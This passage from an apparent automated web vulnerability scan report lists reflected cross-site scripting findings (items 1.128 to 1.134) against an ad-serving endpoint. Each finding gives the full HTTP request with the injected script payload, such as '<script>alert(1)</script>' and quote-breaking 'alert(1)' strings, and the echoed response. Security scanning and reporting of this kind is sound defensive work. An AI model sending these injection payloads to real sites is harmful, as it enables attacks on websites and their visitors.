Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10027
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:41 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/8G8GFWIREBUW/9_1_updated_Glomo_IR/BW_728x90_IR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/direct4c209';d57c61ac63f;ai.180920921;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/direct4c209';d57c61ac63f;ai.180920921;ct.1/01" />
...[SNIP]...

1.128. http://redcated/8GF/iview/273499083/direct/01/4055590 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2656d</script><script>alert(1)</script>23fe364328 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f2656d</script><script>alert(1)</script>23fe364328 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10109
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:36 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f2656d</script><script>alert(1)</script>23fe364328",
clickThruUrl: "http://clk.redcated/go/273499083/direct;ai.180920921;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

1.129. http://redcated/8GF/iview/273499083/direct/01/4055590 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed69'-alert(1)-'620381f48c5 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f8ed69'-alert(1)-'620381f48c5 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10018
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:36 GMT

<html><head><title>BW_728x90_PR_TradeshowBanner</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f8ed69'-alert(1)-'620381f48c5');
}
else
{
_strContentBUW1288825341643 = '<a target="_blank" href="http://clk.atdmt.com/go/273499083/direct;ai.189412363;ct.1/01/" onclick="if(\'http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3
...[SNIP]...

1.130. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a13fa'-alert(1)-'d10f1ed129e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&a13fa'-alert(1)-'d10f1ed129e=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10016
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:38 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&a13fa'-alert(1)-'d10f1ed129e=1');
}
else
{
_strContentBUW1283366279356 = '<a target="_blank" href="http://clk.atdmt.com/go/273499083/direct;ai.180920921;ct.1/01/" onclick="if(\'http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e
...[SNIP]...

1.131. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97117"><script>alert(1)</script>624b718fa81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&97117"><script>alert(1)</script>624b718fa81=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10095
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:37 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&97117"><script>alert(1)</script>624b718fa81=1\')(new Image).src=\'http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cb
...[SNIP]...

1.132. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdfe"-alert(1)-"bc4ea792af0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&3fdfe"-alert(1)-"bc4ea792af0=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10048
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:37 GMT

<html><head><title>BW_728x90_PR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&3fdfe"-alert(1)-"bc4ea792af0=1",
clickThruUrl: "http://clk.redcated/go/273499083/direct;ai.180923822;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

1.133. http://redcated/8GF/iview/273499083/direct/01/4347559 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4347559

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc601'%3ba4b4776bc56 was submitted in the REST URL parameter 4. This input was echoed as dc601';a4b4776bc56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/directdc601'%3ba4b4776bc56/01/4347559 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6265
Content-Type: text/html
Expires: 0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:33:21 GMT
Connection: close

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/8G8GFWIREBUW/9_1_updated_Glomo_IR/BW_728x90_IR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/directdc601';a4b4776bc56;ai.180920921;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/directdc601';a4b4776bc56;ai.180920921;ct.1/01" />
...[SNIP]...

1.134. http://redcated/8GF/iview/273499083/direct/01/4353325 [REST URL parameter 4]  previous  next

Summary

Severity:   High
